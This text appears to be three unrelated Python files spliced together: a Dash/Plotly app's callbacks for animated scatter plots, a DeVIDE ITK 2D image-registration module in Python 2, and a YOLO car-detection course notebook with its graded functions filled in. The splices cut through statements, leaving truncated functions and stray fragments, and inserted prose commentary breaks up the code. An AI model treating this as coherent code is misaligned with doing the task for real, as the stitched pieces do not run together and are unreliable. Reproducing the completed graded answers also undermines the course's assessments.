color_continuous_scale='Viridis',
range_color=color_val
).update_xaxes(showgrid=False, title_standoff=10,
title=x.translate(SUP),
autorange=True,
ticks='outside',
showline=True,
showspikes=True,
spikethickness=1,
spikedash='solid',
mirror=True,
tickformat=".1f").update_yaxes(spikedash='solid', title_standoff=10,
showgrid=False,
title=dict(text=y.translate(SUP)
, standoff=5),
autorange=True,
ticks='outside',
showspikes=True,
spikethickness=1,
showline=True,
mirror=True,
tickformat=".1f").update_layout(
clickmode='event+select',
hovermode='closest',
margin={'l': 80},
autosize=True,
font=dict(family='Helvetica', ),
coloraxis_colorbar=dict(title=dict(text=color.translate(SUP), side='right'), ypad=0),
).update_traces(marker=dict(size=10,
opacity=0.7,
showscale=False,
line=dict(width=0.7, color='DarkSlateGrey'),
colorscale="Viridis"))
# POPULATE AXIS DROPDOWN 4VAR ENV ANIM
@app.callback([Output('xaxis-anim', 'options'),
Output('yaxis-anim', 'options'),
Output('caxis-anim', 'options'),
Output('saxis-anim', 'options')
],
[Input('csv-data', 'data')])
def populate_dropdown_4var_anim(data):
if not data:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
options = [{'label': i, 'value': i} for i in df.columns]
return options, options, options, options
# SIZE MODAL CALLBACK 4VAR ENV ANIM
@app.callback(
Output('modal-4Var', 'is_open'),
[Input('saxis-anim', 'value'),
Input('data-table-upload', 'contents'),
Input('close', 'n_clicks')],
[State('data-table-upload', 'filename')])
def update_output_4Var(size_value, contents, modal_close, filename):
ctx = dash.callback_context
user_clicked = ctx.triggered[0]['prop_id'].split('.')[0]
if not user_clicked or user_clicked == 'close':
return dash.no_update
if contents is None or filename is None or size_value is None:
return False
df = parse_contents(contents, filename)
size_list = df[size_value].to_list()
# Open the modal only when the chosen size column contains alphabetic text
for item in size_list:
if any(c.isalpha() for c in str(item)):
return True
return False
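The size/color modal callbacks all reduce to one validation: open the modal when the chosen column contains alphabetic (non-numeric) text. As a reusable predicate (name hypothetical):

```python
def column_is_non_numeric(values):
    # True when any cell contains an alphabetic character
    return any(any(c.isalpha() for c in str(v)) for v in values)

assert column_is_non_numeric(['1.2', 'abc', '3'])
assert not column_is_non_numeric(['1.2', '3.4'])
```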
# POPULATE COLORBAR SLIDER SCATTER 4VAR ENV ANIM
@app.callback([Output('colorbar-slider-4D', 'min'),
Output('colorbar-slider-4D', 'max'),
Output('colorbar-slider-4D', 'step'),
Output('colorbar-slider-4D', 'value')
],
[Input('csv-data', 'data'),
Input('caxis-anim', 'value')
],
[State('csv-data', 'data')])
def populate_pressure_slider_4Var(_, color, data):
if not data or not color:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
min_v = round(float(df[color].min()), 1)
max_v = round(float(df[color].max()), 1)
step = 0.1
value = [round(float(df[color].min()), 1), round(float(df[color].max()), 1)]
return min_v, max_v, step, value
@app.callback(
Output('slider-output-container-4D', 'children'),
[Input('colorbar-slider-4D', 'value')])
def update_output_4Var(value):
return 'You have selected "{}"'.format(value)
# SIZE RANGE
@app.callback(
Output('size-container-4D', 'children'),
[Input('saxis-anim', 'value'),
Input('csv-data', 'data')],
[State('csv-data', 'data')]
)
def update_output_size_range_4Var(size, __, data):
if not data or not size:
return dash.no_update
df = pd.read_json(data, orient='split')
size_range = [round(df[size].min(), 2), round(df[size].max(), 2)]
return 'Size range: {}'.format(size_range)
# POPULATE GRAPH 4VAR ENV ANIM FRAME
@app.callback(
Output('anim-frame-4Var', 'options'),
[Input('csv-data', 'data')]
)
def populate_animation_frame_4var(data):
if not data:
return dash.no_update
df = pd.read_json(data, orient='split')
dff = df.select_dtypes(exclude=['object'])
options = [{'label': i, 'value': i} for i in dff.columns]
return options
# POPULATE GRAPH 4VAR ENV ANIM
@app.callback(Output('my-graph', 'figure'),
[
Input('xaxis-anim', 'value'),
Input('yaxis-anim', 'value'),
Input('caxis-anim', 'value'),
Input('saxis-anim', 'value'),
Input('colorbar-slider-4D', 'value'),
Input('anim-frame-4Var', 'value')],
[State('csv-data', 'data')]
)
def update_figure_4Var(x, y, color, size, color_value, frame, data):
if not data or not color_value:
return dash.no_update
df = pd.read_json(data, orient='split')
# size_range = [df[size].min(), df[size].max()]
color_val = [float(v) for v in color_value]
return px.scatter(df.sort_values(by=[frame]), x=x, y=y, title="", animation_frame=frame,
animation_group=df.columns[0], size=size, color=color,
hover_name=df.columns[0],
color_continuous_scale='Viridis',
hover_data={}, template="none", range_color=color_val
).update_xaxes(showgrid=False, title=x.translate(SUP), autorange=True, ticks='outside',
showline=True, showspikes=True, spikethickness=1, spikedash='solid',
title_standoff=10,
mirror=True, tickformat=".1f").update_yaxes(spikedash='solid',
showgrid=False, title_standoff=10,
title=dict(text=y.translate(SUP),
standoff=5),
autorange=True, ticks='outside',
showspikes=True, spikethickness=1,
showline=True, mirror=True,
tickformat=".1f").update_layout(
clickmode='event+select', hovermode='closest', margin={'l': 80}, autosize=True, font=dict(family='Helvetica'),
coloraxis_colorbar=dict(title=dict(text=color.translate(SUP), side='right', font=dict(size=14)), ypad=0),
# annotations=[
# dict(x=1.5, y=-0.15, showarrow=False, align='left',
# text='Size range: {}'.format(size_range), xref='paper', yref='paper', font=dict(size=14))
# ]
).update_traces(marker=dict(opacity=0.7, showscale=False, line=dict(width=0.5, color='DarkSlateGrey'),
))
# POPULATE AXIS DROPDOWN 5VAR (3D) ENV ANIM
@app.callback([Output('xaxis-3D', 'options'),
Output('yaxis-3D', 'options'),
Output('zaxis-3D', 'options'),
Output('saxis-3D', 'options'),
Output('caxis-3D', 'options')
],
[Input('csv-data', 'data')], )
def populate_dropdown_5D_anim(data):
if not data:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
options = [{'label': i, 'value': i} for i in df.columns]
return options, options, options, options, options
# SIZE MODAL CALLBACK 5VAR (3D) ENV ANIM
@app.callback(
Output('modal-5Var', 'is_open'),
[Input('saxis-3D', 'value'),
Input('data-table-upload', 'contents'),
Input('close-5D', 'n_clicks')],
[State('data-table-upload', 'filename')])
def update_output_modal5(size_value, contents, modal_close, filename):
ctx = dash.callback_context
user_clicked = ctx.triggered[0]['prop_id'].split('.')[0]
if not user_clicked or user_clicked == 'close':
return dash.no_update
if contents is None or filename is None or size_value is None:
return False
df = parse_contents(contents, filename)
size_list = df[size_value].to_list()
# Open the modal only when the chosen size column contains alphabetic text
for item in size_list:
if any(c.isalpha() for c in str(item)):
return True
return False
# POPULATE COLORBAR SLIDER SCATTER 5VAR (3D) ENV ANIM
@app.callback([Output('colorbar-slider-5D', 'min'),
Output('colorbar-slider-5D', 'max'),
Output('colorbar-slider-5D', 'step'),
Output('colorbar-slider-5D', 'value')
],
[Input('csv-data', 'data'),
Input('caxis-3D', 'value')
],
[State('csv-data', 'data')])
def populate_pressure_slider_5D(_, color, data):
if not data or not color:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
min_v = round(float(df[color].min()), 1)
max_v = round(float(df[color].max()), 1)
step = 0.1
value = [round(float(df[color].min()), 1), round(float(df[color].max()), 1)]
return min_v, max_v, step, value
@app.callback(
Output('slider-output-container-5D', 'children'),
[Input('colorbar-slider-5D', 'value')])
def update_output_colorbar_5D(value):
return 'You have selected "{}"'.format(value)
# SIZE RANGE
@app.callback(
Output('size-slider-container-5D', 'children'),
[Input('saxis-3D', 'value'),
Input('csv-data', 'data')],
[State('csv-data', 'data')]
)
def update_output_size_range_5D(size, __, data):
if not data or not size:
return dash.no_update
df = pd.read_json(data, orient='split')
size_range = [round(df[size].min(), 2), round(df[size].max(), 2)]
return 'Size range: {}'.format(size_range)
@app.callback(
Output('anim-frame-5D', 'options'),
[Input('csv-data', 'data')]
)
def populate_animation_frame_5D(data):
if not data:
return dash.no_update
df = pd.read_json(data, orient='split')
dff = df.select_dtypes(exclude=['object'])
options = [{'label': i, 'value': i} for i in dff.columns]
return options
# POPULATE GRAPH 5VAR (3D) ENV ANIM
@app.callback(Output("graph", "figure"),
[Input('xaxis-3D', "value"),
Input('yaxis-3D', 'value'),
Input('zaxis-3D', 'value'),
Input('caxis-3D', 'value'),
Input('saxis-3D', 'value'),
Input('colorbar-slider-5D', 'value'),
Input('anim-frame-5D', 'value')],
[State('csv-data', 'data')]
)
def make_figure(x, y, z, color, size, color_value, frame, data):
if not data or not color_value:
return dash.no_update
if None in (x, y, z, color, size):
return dash.no_update
df = pd.read_json(data, orient='split')
color_val = [float(v) for v in color_value]
return px.scatter_3d(df.sort_values(by=[frame]), x=x, y=y, z=z, title="", animation_frame=frame,
animation_group=df.columns[0], size=size, color=color,
hover_name=df.columns[0],
color_continuous_scale='Viridis',
hover_data={}, template="none", range_color=color_val
).update_xaxes(showgrid=False, title=x.translate(SUP), autorange=True, tickformat=".1f"
).update_yaxes(
showgrid=False, title=y.translate(SUP), autorange=True, tickformat=".1f").update_layout(
coloraxis_colorbar=dict(title=dict(text=color.translate(SUP), side='right', font=dict(size=14)), ypad=0),
font=dict(family='Helvetica'),
clickmode='event+select', hovermode='closest', margin={'l': 50, 'b': 80, 't': 50, 'r': 10}, autosize=True,
).update_traces(
marker=dict(opacity=0.7, showscale=False, line=dict(width=0.5, color='#3d3d3d'),
))
# POPULATE AXIS DROPDOWN SCATTER DATA TABLE FIGURE
@app.callback([Output('xaxis', 'options'),
Output('yaxis', 'options'),
Output('caxis', 'options'),
Output('saxis', 'options')
],
[Input('csv-data', 'data')], )
def populate_scatter_dropdown(data):
if not data:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
options = [{'label': i, 'value': i} for i in df.columns]
return options, options, options, options
# SIZE MODAL CALLBACK SCATTER DATA TABLE
@app.callback(
Output('modal-data', 'is_open'),
[Input('saxis', 'value'),
Input('data-table-upload', 'contents'),
Input('close-data', 'n_clicks')],
[State('data-table-upload', 'filename')])
def update_size_modal(size_value, contents, modal_close, filename):
ctx = dash.callback_context
user_clicked = ctx.triggered[0]['prop_id'].split('.')[0]
if not user_clicked or user_clicked == 'close':
return dash.no_update
if contents is None or filename is None or size_value is None:
return False
df = parse_contents(contents, filename)
size_list = df[size_value].to_list()
# Open the modal only when the chosen size column contains alphabetic text
for item in size_list:
if any(c.isalpha() for c in str(item)):
return True
return False
# COLOR MODAL CALLBACK SCATTER DATA TABLE
@app.callback(
Output('modal-datac', 'is_open'),
[Input('caxis', 'value'),
Input('data-table-upload', 'contents'),
Input('close-datac', 'n_clicks')],
[State('data-table-upload', 'filename')])
def update_color_modal(color_value, contents, modal_close, filename):
ctx = dash.callback_context
user_clicked = ctx.triggered[0]['prop_id'].split('.')[0]
if not user_clicked or user_clicked == 'close':
return dash.no_update
if contents is None or filename is None or color_value is None:
return False
df = parse_contents(contents, filename)
color_list = df[color_value].to_list()
# Open the modal only when the chosen color column contains alphabetic text
for item in color_list:
if any(c.isalpha() for c in str(item)):
return True
return False
# POPULATE DATA TABLE SCATTER
@app.callback([Output('data-table-interact', 'data'),
Output('data-table-interact', 'columns')],
[Input('data-table-upload', 'contents')],
[State('data-table-upload', 'filename')])
def update_output(contents, filename):
if contents is None:
return [{}],
# Copyright (c) <NAME>, TU Delft
# All rights reserved.
# See COPYRIGHT for details.
# TODO:
# * if the input imageStackRDR is reconfigured to read a different stack
# by the user, then things will break. We probably have to add an observer
# and adapt to the new situation.
# * ditto for the input transformStackRDR
# * an observer which internally disconnects in the case of a screwup would
# be good enough; the user can be warned that he should reconnect
import gen_utils
from typeModules.imageStackClass import imageStackClass
from typeModules.transformStackClass import transformStackClass
from module_base import ModuleBase
import module_utils
import operator
import fixitk as itk
import ConnectVTKITKPython as CVIPy
import vtk
import wx
class register2D(ModuleBase):
"""Registers a stack of 2D images and generates a list of transforms.
This is BAD-ASSED CODE(tm) and can crash the whole of DeVIDE without
even saying sorry afterwards. You have been warned.
"""
def __init__(self, module_manager):
ModuleBase.__init__(self, module_manager)
self._createLogic()
self._createViewFrames()
self._bindEvents()
# FIXME: add current transforms to config stuff
def close(self):
# we do this just in case...
self.set_input(0, None)
self.set_input(1, None)
ModuleBase.close(self)
# take care of the IPWs
self._destroyIPWs()
# take care of pipeline thingies
del self._rescaler1
del self._itkExporter1
del self._vtkImporter1
del self._resampler2
del self._rescaler2
del self._itkExporter2
del self._vtkImporter2
# also take care of our output!
del self._transformStack
# nasty trick to take care of RenderWindow
self._threedRenderer.RemoveAllProps()
del self._threedRenderer
self.viewerFrame.threedRWI.GetRenderWindow().WindowRemap()
self.viewerFrame.Destroy()
del self.viewerFrame
# then do the controlFrame
self.controlFrame.Destroy()
del self.controlFrame
def get_input_descriptions(self):
return ('ITK Image Stack', '2D Transform Stack')
def set_input(self, idx, inputStream):
if idx == 0:
if inputStream != self._imageStack:
# if it's None, we have to take it
if inputStream is None:
# disconnect
del self._transformStack[:]
self._destroyIPWs()
self._imageStack = None
self._pairNumber = -1
return
# let's setup for a new stack!
try:
assert(inputStream.__class__.__name__ == 'imageStackClass')
inputStream.Update()
assert(len(inputStream) >= 2)
except Exception:
# if the Update call doesn't work or
# if the input list is not long enough (or unsizable),
# we don't do anything
raise TypeError, \
"register2D requires an ITK Image Stack of minimum length 2 as input."
# now check that the imageStack is the same size as the
# transformStack
if self._inputTransformStack and \
len(inputStream) != len(self._inputTransformStack):
raise TypeError, \
"The Image Stack you are trying to connect has a\n" \
"different length than the connected Transform\n" \
"Stack."
self._imageStack = inputStream
if self._inputTransformStack:
self._copyInputTransformStack()
else:
# create a new transformStack
del self._transformStack[:]
# the first transform is always identity
for dummy in self._imageStack:
self._transformStack.append(
itk.itkEuler2DTransform_New())
self._transformStack[-1].SetIdentity()
self._showImagePair(1)
else: # closes if idx == 0 block
if inputStream != self._inputTransformStack:
if inputStream is None:
# we disconnect, but we keep the transforms we have
self._inputTransformStack = None
return
try:
assert(inputStream.__class__.__name__ == \
'transformStackClass')
except Exception:
raise TypeError, \
"register2D requires an ITK Transform Stack on " \
"this port."
inputStream.Update()
if len(inputStream) < 2:
raise TypeError, \
"The input transform stack should be of minimum " \
"length 2."
if self._imageStack and \
len(inputStream) != len(self._imageStack):
raise TypeError, \
"The Transform Stack you are trying to connect\n" \
"has a different length than the connected\n" \
"Transform Stack"
self._inputTransformStack = inputStream
if self._imageStack:
self._copyInputTransformStack()
self._showImagePair(self._pairNumber)
def get_output_descriptions(self):
return ('2D Transform Stack',)
def get_output(self, idx):
return self._transformStack
def execute_module(self):
pass
def view(self, parent_window=None):
# if the window is already visible, raise it
if not self.viewerFrame.Show(True):
self.viewerFrame.Raise()
if not self.controlFrame.Show(True):
self.controlFrame.Raise()
# ----------------------------------------------------------------------
# non-API methods start here -------------------------------------------
# ----------------------------------------------------------------------
def _bindEvents(self):
wx.EVT_BUTTON(self.viewerFrame, self.viewerFrame.showControlsButtonId,
self._handlerShowControls)
wx.EVT_BUTTON(self.viewerFrame, self.viewerFrame.resetCameraButtonId,
lambda e: self._resetCamera())
wx.EVT_SPINCTRL(self.controlFrame,
self.controlFrame.pairNumberSpinCtrlId,
self._handlerPairNumberSpinCtrl)
wx.EVT_BUTTON(self.controlFrame, self.controlFrame.transformButtonId,
self._handlerTransformButton)
wx.EVT_BUTTON(self.controlFrame, self.controlFrame.registerButtonId,
self._handlerRegisterButton)
def _copyInputTransformStack(self):
"""Copy the contents of the inputTransformStack to the internal
transform stack.
"""
# take care of the current ones
del self._transformStack[:]
# then copy
for trfm in self._inputTransformStack:
# FIXME: do we need to take out a ref?
self._transformStack.append(trfm)
def _createLogic(self):
# input
self._imageStack = None
# optional input
self._inputTransformStack = None
# output is a transform stack
self._transformStack = transformStackClass(self)
self._ipw1 = None
self._ipw2 = None
# some control variables
self._pairNumber = -1
# we need two converters from itk::Image to vtkImageData
self._transform1 = itk.itkEuler2DTransform_New()
self._transform1.SetIdentity()
print self._transform1.GetParameters()
self._rescaler1 = itk.itkRescaleIntensityImageFilterF2F2_New()
self._rescaler1.SetOutputMinimum(0)
self._rescaler1.SetOutputMaximum(255)
self._itkExporter1 = itk.itkVTKImageExportF2_New()
self._itkExporter1.SetInput(self._rescaler1.GetOutput())
self._vtkImporter1 = vtk.vtkImageImport()
CVIPy.ConnectITKF2ToVTK(self._itkExporter1.GetPointer(),
self._vtkImporter1)
self._resampler2 = None
self._rescaler2 = itk.itkRescaleIntensityImageFilterF2F2_New()
self._rescaler2.SetOutputMinimum(0)
self._rescaler2.SetOutputMaximum(255)
self._itkExporter2 = itk.itkVTKImageExportF2_New()
self._itkExporter2.SetInput(self._rescaler2.GetOutput())
self._vtkImporter2 = vtk.vtkImageImport()
CVIPy.ConnectITKF2ToVTK(self._itkExporter2.GetPointer(),
self._vtkImporter2)
def _createViewFrames(self):
import modules.Insight.resources.python.register2DViewFrames
reload(modules.Insight.resources.python.register2DViewFrames)
viewerFrame = modules.Insight.resources.python.register2DViewFrames.\
viewerFrame
self.viewerFrame = module_utils.instantiate_module_view_frame(
self, self._module_manager, viewerFrame)
self._threedRenderer = vtk.vtkRenderer()
self._threedRenderer.SetBackground(0.5, 0.5, 0.5)
self.viewerFrame.threedRWI.GetRenderWindow().AddRenderer(
self._threedRenderer)
istyle = vtk.vtkInteractorStyleImage()
self.viewerFrame.threedRWI.SetInteractorStyle(istyle)
# controlFrame creation
controlFrame = modules.Insight.resources.python.\
register2DViewFrames.controlFrame
self.controlFrame = module_utils.instantiate_module_view_frame(
self, self._module_manager, controlFrame)
# display
self.viewerFrame.Show(True)
self.controlFrame.Show(True)
def _createIPWs(self):
self._ipw1 = vtk.vtkImagePlaneWidget()
self._ipw2 = vtk.vtkImagePlaneWidget()
for ipw, vtkImporter in ((self._ipw1, self._vtkImporter1),
(self._ipw2, self._vtkImporter2)):
vtkImporter.Update()
ipw.SetInput(vtkImporter.GetOutput())
ipw.SetPlaneOrientation(2)
ipw.SetInteractor(self.viewerFrame.threedRWI)
ipw.On()
ipw.InteractionOff()
self._setModeRedGreen()
def _destroyIPWs(self):
"""If the two IPWs exist, remove them completely and remove all
bindings that we have.
"""
for ipw in (self._ipw1, self._ipw2):
if ipw:
# switch off
ipw.Off()
# disconnect from interactor
ipw.SetInteractor(None)
# disconnect from its input
ipw.SetInput(None)
self._ipw1 = None
self._ipw2 = None
def _handlerPairNumberSpinCtrl(self, event):
self._showImagePair(self.controlFrame.pairNumberSpinCtrl.GetValue())
def _handlerRegisterButton(self, event):
maxIterations = gen_utils.textToFloat(
self.controlFrame.maxIterationsTextCtrl.GetValue(), 50)
if not maxIterations > 0:
maxIterations = 50
self._registerCurrentPair(maxIterations)
self.controlFrame.maxIterationsTextCtrl.SetValue(str(maxIterations))
def _handlerShowControls(self, event):
# make sure the window is visible and raised
self.controlFrame.Show(True)
self.controlFrame.Raise()
def _handlerTransformButton(self, event):
# take xtranslate, ytranslate, rotate and work it into the current
# transform (if that exists)
if self._pairNumber > 0:
pda = self._transformStack[self._pairNumber].GetParameters()
rot = gen_utils.textToFloat(
self.controlFrame.rotationTextCtrl.GetValue(),
pda.GetElement(0))
xt = gen_utils.textToFloat(
self.controlFrame.xTranslationTextCtrl.GetValue(),
pda.GetElement(1))
yt = gen_utils.textToFloat(
self.controlFrame.yTranslationTextCtrl.GetValue(),
pda.GetElement(2))
pda.SetElement(0, rot)
pda.SetElement(1, xt)
pda.SetElement(2, yt)
self._transformStack[self._pairNumber].SetParameters(pda)
# we have to do this manually
self._transformStack[self._pairNumber].Modified()
self._rescaler2.Update() # give ITK a chance to complain
self.viewerFrame.threedRWI.GetRenderWindow().Render()
def _registerCurrentPair(self, maxIterations):
if not self._pairNumber > 0:
# no data, return
return
currentTransform = self._transformStack[self._pairNumber]
fixedImage = self._imageStack[self._pairNumber - 1]
movingImage = self._imageStack[self._pairNumber]
registration = itk.itkImageRegistrationMethodF2F2_New()
# sum of squared differences
imageMetric = itk.itkMeanSquaresImageToImageMetricF2F2_New()
#imageMetric = itk.itkNormalizedCorrelationImageToImageMetricF2F2_New()
optimizer = itk.itkRegularStepGradientDescentOptimizer_New()
#optimizer = itk.itkConjugateGradientOptimizer_New()
interpolator = itk.itkLinearInterpolateImageFunctionF2D_New()
registration.SetOptimizer(optimizer.GetPointer())
registration.SetTransform(currentTransform.GetPointer() )
registration.SetInterpolator(interpolator.GetPointer())
registration.SetMetric(imageMetric.GetPointer())
registration.SetFixedImage(fixedImage)
registration.SetMovingImage(movingImage)
registration.SetFixedImageRegion(fixedImage.GetBufferedRegion())
initialParameters = currentTransform.GetParameters()
registration.SetInitialTransformParameters( initialParameters )
#
# Define optimizer parameters
#
optimizer.SetMaximumStepLength( 1 )
optimizer.SetMinimumStepLength( 0.01 )
optimizer.SetNumberOfIterations( maxIterations )
# very important: the scales
# the larger a scale, the smaller the impact of that parameter on
# the calculated gradient
scalesDA = itk.itkArrayD(3)
scalesDA.SetElement(0, 1e-01)
scalesDA.SetElement(1, 1e-05)
scalesDA.SetElement(2, 1e-05)
optimizer.SetScales(scalesDA)
#
# Start the registration process
#
def iterationEvent():
pm = "register2D optimizer value: %f stepsize: %f" % \
(optimizer.GetValue(),
optimizer.GetCurrentStepLength())
p = (optimizer.GetCurrentIteration() + 1) / maxIterations * 100.0
self._module_manager.setProgress(p, pm)
pc2 = itk.itkPyCommand_New()
pc2.SetCommandCallable(iterationEvent)
optimizer.AddObserver(itk.itkIterationEvent(),
pc2.GetPointer())
# FIXME: if this throws an exception, reset transform!
registration.StartRegistration()
fpm = 'register2D registration done (final value: %0.2f).' % \
optimizer.GetValue()
self._module_manager.setProgress(100.0, fpm)
print registration.GetLastTransformParameters().GetElement(0)
print registration.GetLastTransformParameters().GetElement(1)
print registration.GetLastTransformParameters().GetElement(2)
self._syncGUIToCurrentPair()
currentTransform.Modified()
self._rescaler2.Update() # give ITK a chance to complain
self.viewerFrame.threedRWI.GetRenderWindow().Render()
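The scales comment in `_registerCurrentPair` can be illustrated with a minimal, self-contained sketch. This is not ITK's actual scaled-space mechanics, only the damping idea: the effective step for each parameter is the raw gradient component divided by its scale, so a larger scale means a smaller move for that parameter. The numbers below are hypothetical.

```python
def scaled_gradient_step(params, grads, scales, step_length=1.0):
    """One gradient-descent step where each parameter's move is damped
    by its scale: the larger the scale, the smaller the impact."""
    return [p - step_length * g / s for p, g, s in zip(params, grads, scales)]

# With equal raw gradients, the rotation (scale 1e-1) moves far less than
# the translations (scale 1e-5), matching the scales set on the optimizer.
params = [0.0, 0.0, 0.0]  # rotation, x translation, y translation
grads = [1.0, 1.0, 1.0]
new_params = scaled_gradient_step(params, grads, [1e-1, 1e-5, 1e-5])
```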
def _resetCamera(self):
"""If an IPW is available (i.e. there's some data), this method
will setup the camera to be nice and orthogonal to the IPW.
"""
if self._ipw1:
# VTK5 vs old-style VTK
try:
planeSource = self._ipw1.GetPolyDataAlgorithm()
except AttributeError:
planeSource = self._ipw1.GetPolyDataSource()
cam = self._threedRenderer.GetActiveCamera()
cam.SetPosition(planeSource.GetCenter()[0],
planeSource.GetCenter()[1], 10)
cam.SetFocalPoint(planeSource.GetCenter())
cam.OrthogonalizeViewUp()
cam.SetViewUp(0,1,0)
cam.SetClippingRange(1, 11)
v2 = map(operator.sub, planeSource.GetPoint2(),
planeSource.GetOrigin())
n2 = vtk.vtkMath.Normalize(v2)
cam.SetParallelScale(n2 / 2.0)
cam.ParallelProjectionOn()
self.viewerFrame.threedRWI.GetRenderWindow().Render()
def _setModeCheckerboard(self):
pass
def _setModeRedGreen(self):
"""Set visualisation mode to RedGreen.
The second image is always green.
"""
#for ipw, col in ((self._ipw1, 0.0), (self._ipw2, 0.3)):
for ipw, col in ((self._ipw2, 0.3),):
inputData = ipw.GetInput()
inputData.Update() # make sure the metadata is up to date
minv, maxv = inputData.GetScalarRange()
lut = vtk.vtkLookupTable()
lut.SetTableRange((minv, maxv))
lut.SetHueRange((col, col)) # keep it green!
lut.SetSaturationRange((1.0, 1.0))
lut.SetValueRange((0.0, 1.0))
lut.SetAlphaRange((0.5, 0.5))
lut.Build()
ipw.SetLookupTable(lut)
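The constant-hue lookup table built above can be sketched in plain Python with the standard library's colorsys module. This is a rough analogue of vtkLookupTable, not VTK's implementation; the table size and function name are illustrative.

```python
import colorsys

def single_hue_lut(n, hue, alpha=0.5):
    """n-entry table with fixed hue and full saturation; value ramps 0 -> 1,
    mirroring the SetHueRange/SetSaturationRange/SetValueRange calls above."""
    return [colorsys.hsv_to_rgb(hue, 1.0, i / (n - 1)) + (alpha,)
            for i in range(n)]

lut = single_hue_lut(256, 0.3)  # 0.3 ~ the green hue used for the second image
```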
def _showImagePair(self, pairNumber):
"""Set everything up to have the user interact with image pair
pairNumber.
pairNumber is 1 based, i.e. pairNumber 1 implies the registration
between image 1 and | |
# # Autonomous driving - Car detection
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import scipy.io
import scipy.misc
import numpy as np
import pandas as pd
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, scale_boxes
from yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, yolo_loss, yolo_body
get_ipython().magic('matplotlib inline')
# GRADED FUNCTION: yolo_filter_boxes
def yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = .6):
"""Filters YOLO boxes by thresholding on object and class confidence.
Arguments:
box_confidence -- tensor of shape (19, 19, 5, 1)
boxes -- tensor of shape (19, 19, 5, 4)
box_class_probs -- tensor of shape (19, 19, 5, 80)
threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
Returns:
scores -- tensor of shape (None,), containing the class probability score for selected boxes
boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes
classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes
Note: "None" is here because you don't know the exact number of selected boxes, as it depends on the threshold.
For example, the actual output size of scores would be (10,) if there are 10 boxes.
"""
# Step 1: Compute box scores
### START CODE HERE ### (≈ 1 line)
box_scores = box_confidence * box_class_probs
### END CODE HERE ###
# Step 2: Find the box_classes using the max box_scores, keep track of the corresponding score
### START CODE HERE ### (≈ 2 lines)
box_classes = K.argmax(box_scores, axis=-1)
box_class_scores = K.max(box_scores, axis=-1, keepdims=False)
### END CODE HERE ###
# Step 3: Create a filtering mask based on "box_class_scores" by using "threshold". The mask should have the
# same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)
### START CODE HERE ### (≈ 1 line)
filtering_mask = box_class_scores >= threshold
### END CODE HERE ###
# Step 4: Apply the mask to scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = tf.boolean_mask(box_class_scores, filtering_mask)
boxes = tf.boolean_mask(boxes, filtering_mask)
classes = tf.boolean_mask(box_classes, filtering_mask)
### END CODE HERE ###
return scores, boxes, classes
# In[15]:
with tf.Session() as test_a:
box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed = 1)
box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = 0.5)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.shape))
print("boxes.shape = " + str(boxes.shape))
print("classes.shape = " + str(classes.shape))
# GRADED FUNCTION: iou
def iou(box1, box2):
"""Implement the intersection over union (IoU) between box1 and box2
Arguments:
box1 -- first box, list object with coordinates (x1, y1, x2, y2)
box2 -- second box, list object with coordinates (x1, y1, x2, y2)
"""
# Calculate the (y1, x1, y2, x2) coordinates of the intersection of box1 and box2. Calculate its Area.
### START CODE HERE ### (≈ 5 lines)
xi1 = np.max([box1[0], box2[0]])
yi1 = np.max([box1[1], box2[1]])
xi2 = np.min([box1[2], box2[2]])
yi2 = np.min([box1[3], box2[3]])
inter_area = max(xi2 - xi1, 0) * max(yi2 - yi1, 0)  # clamp at 0 so disjoint boxes give zero intersection
### END CODE HERE ###
# Calculate the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)
### START CODE HERE ### (≈ 3 lines)
box1_area = (box1[3]-box1[1])*(box1[2]-box1[0])
box2_area = (box2[3]-box2[1])*(box2[2]-box2[0])
union_area = box1_area + box2_area - inter_area
### END CODE HERE ###
# compute the IoU
### START CODE HERE ### (≈ 1 line)
iou = inter_area/union_area
### END CODE HERE ###
return iou
# In[19]:
box1 = (2, 1, 4, 3)
box2 = (1, 2, 3, 4)
print("iou = " + str(iou(box1, box2)))
# GRADED FUNCTION: yolo_non_max_suppression
def yolo_non_max_suppression(scores, boxes, classes, max_boxes = 10, iou_threshold = 0.5):
"""
Applies Non-max suppression (NMS) to set of boxes
Arguments:
scores -- tensor of shape (None,), output of yolo_filter_boxes()
boxes -- tensor of shape (None, 4), output of yolo_filter_boxes() that have been scaled to the image size (see later)
classes -- tensor of shape (None,), output of yolo_filter_boxes()
max_boxes -- integer, maximum number of predicted boxes you'd like
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (None,), predicted score for each box
boxes -- tensor of shape (None, 4), predicted box coordinates
classes -- tensor of shape (None,), predicted class for each box
Note: The "None" dimension of the output tensors is at most max_boxes.
"""
max_boxes_tensor = K.variable(max_boxes, dtype='int32') # tensor to be used in tf.image.non_max_suppression()
K.get_session().run(tf.variables_initializer([max_boxes_tensor])) # initialize variable max_boxes_tensor
# Use tf.image.non_max_suppression() to get the list of indices corresponding to boxes you keep
